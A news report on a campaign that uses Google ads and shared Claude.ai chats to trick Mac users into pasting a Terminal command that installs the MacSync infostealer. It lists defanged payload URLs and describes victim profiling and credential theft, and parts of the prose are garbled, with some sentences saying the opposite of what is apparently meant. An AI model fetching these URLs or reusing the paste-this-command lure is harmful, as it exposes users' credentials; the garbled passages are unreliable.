Hackers abuse Google ads, Claude.ai chats to push Mac malware

Attackers are exploiting Google Ads and official Claude.ai shared chats in an active phishing campaign.

Users searching for “Claude mac download” may encounter sponsored search results listed claude.ai as a target website, but it leads to commands that install malware on their Mac.

Claude’s shared chats are geared towards targeting macOS users

The campaign was spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn.

Albayrak identified a shared Claude.ai chat that presented itself as an official installation guide for “Claude Code on Mac”, named “Apple Support.”

The dialog prompts users to open Terminal and paste a command, which silently downloads and executes the malware on their Mac.

While trying to confirm Albayrak’s findings, BleepingComputer stayed on site the second time shared a discussion of Claude performing the same attack using a completely different infrastructure.

These two interviews follow the same structure and social engineering approach but use different backgrounds and payloads. Both interviews were publicly accessible at the time of writing:

What does macOS malware do?

The base64 commands shown in Claude’s shared thread fetch the encoded shell script from domains like these:

• An exception observed by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
• An exception was spotted by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d

‘loader.sh’ (given in the second link above) is another set of shell commands compressed by Gunzip:

This compressed shell script runs entirely in memory, leaving a clear footprint on disk.

BleepingComputer observed a server serving an obscured version of the download for each request (a process known as polymorphic delivery), making it difficult for security tools to mark downloads based on a known hash or signature.

The identified exception for BleepingComputer starts by checking whether the machine has Russian or CIS regional keyboard input sources configured. If it happens, the script exits without doing anything, sending silence cis_blocked ping status to the attacker’s server when exiting. Only devices that pass this check receive the following category:

Before proceeding, the script also collects the victim’s external IP address, hostname, OS version, and keyboard location, returning it all to the attacker. This type of victim profiling prior to payload delivery suggests that operators are selective about who they target.

The script then pulls the second stage payload and runs it osascriptmacOS’s built-in text engine. This allows an attacker to execute remote code without dumping the normal application or binary.

The exception identified by Albayrak, however, appears to skip the profiling steps. It goes straight to execution.

It harvests browser information, cookies, and macOS Keychain content, packages them, and delivers them to the attacker’s server. Albayrak identified this as a variant of the MacSync macOS infostealer:

Fast internet[.]com shown above in the variant identified by Albayrak appeared to be down at the time of writing.

When a legitimate URL is a threat

Phishing has become a recurring delivery method for malware.

BleepingComputer has previously reported on similar campaigns targeting users looking for software like GIMP, where a convincing Google ad would list a legitimate-looking domain but instead take visitors to a phishing site.

This campaign reverses that, as there is no fake background to be seen.

Both Google ads seen here point to the actual Anthropic site, claude.aias the attackers carried out their brutal instructions within Claude’s shared chat feature. The URL of the site in this ad is real.

However, this is not the first time that attackers have abused the AI ​​platform and shared chats in this way. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users.

Users must go directly to claude.ai to download the native Claude app, rather than clicking on sponsored search results. Claude’s official CLI code is available through the official Anthropic documentation and does not require pasting commands from the chat area.

It’s good practice to handle any instructions that ask you to paste terminal commands with care, regardless of where those commands appear.

BleepingComputer reached out to Anthropic and Google for comment ahead of publication.